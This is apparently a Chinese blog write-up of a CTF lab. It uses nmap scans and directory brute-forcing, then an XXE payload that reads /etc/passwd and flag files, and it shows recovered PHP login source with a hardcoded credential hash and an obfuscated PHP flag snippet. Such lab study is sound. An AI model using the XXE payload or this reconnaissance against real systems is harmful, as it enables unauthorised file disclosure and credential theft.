Nmap使用方法及场景

一直都知道nmap功能很强大,但是平时工作中就只用来扫描端口,渐渐的都忘记了其它的功能及使用方法,正好今天做靶场需要用nmap进行存活主机发现,总结下nmap的使用方法。

场景一:主机发现

nmap -sP 192.168.44.0/24    使用ping命令来发现存活主机

Nmap使用方法及场景

场景二:端口扫描

nmap -v -sV -p- 192.168.44.138 

Nmap使用方法及场景

3,发现开启80端口

Nmap使用方法及场景

4,使用dirsearch进行目录扫描

Nmap使用方法及场景

5,访问robots.txt

Nmap使用方法及场景

6,

Nmap使用方法及场景

Nmap使用方法及场景

7,抓包发现了有意思的东西

Nmap使用方法及场景

8,发现可以利用

<?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE r [
            <!ELEMENT r ANY >
            <!ENTITY admin SYSTEM "file:///etc/passwd">
             ]>
<root><name>&admin;</name><password>admin123</password></root>

Nmap使用方法及场景

Nmap使用方法及场景

base64解密之后,发现用户名和密码存在源码当中,MD5解密,发现用户名为[email protected]

<?php
   session_start();
?>


<html lang = "en">
   
   <head>
      <title>admin</title>
      <link href = "css/bootstrap.min.css" rel = "stylesheet">
      
     
      
   </head>
    
   <body>
      
      <h2>Enter Username and Password</h2> 
      <div class = "container form-signin">
         
         <?php
            $msg = '';
            if (isset($_POST['login']) && !empty($_POST['username']) 
               && !empty($_POST['password'])) {
                
               if ($_POST['username'] == 'administhebest' && 
                  md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
                  $_SESSION['valid'] = true;
                  $_SESSION['timeout'] = time();
                  $_SESSION['username'] = 'administhebest';
                  
                echo "You have entered valid use name and password <br />";
        $flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
        echo $flag;
               }else {
                  $msg = 'Maybe Later';
               }
            }
         ?>
      </div> <!-- W00t/W00t -->
      
      <div class = "container">
      
         <form class = "form-signin" role = "form" 
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']); 
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control" 
               name = "username" 
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit" 
               name = "login">Login</button>
         </form>
            
         Click here to clean <a href = "adminlog.php" tite = "Logout">Session.
         
      </div> 
      
   </body>
</html>

使用admin.php当中发现的用户和密码进行登录

Nmap使用方法及场景

点击红色的Flag跳转到404

Nmap使用方法及场景

一猜就知道在xxe目录下

Nmap使用方法及场景

发现很多靶场都要有一个文件包含、文件读取漏洞,必须得读源码才可以,不然就很难做下去,还可以锻炼一下自己的代码审计能力。

所以,使用xxe读取flagmeout.php文件

Nmap使用方法及场景

base64解密发现第一个flag

Nmap使用方法及场景

 

看着这个flag应该也是编码了,百度下,发现是base32编码

Nmap使用方法及场景

我去,再进行base64解码吧

Nmap使用方法及场景

继续读取/etc/.flag.php源码,base64解码得

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
这是个啥,很像以前做过的一个靶场中的ook编码

先百度一下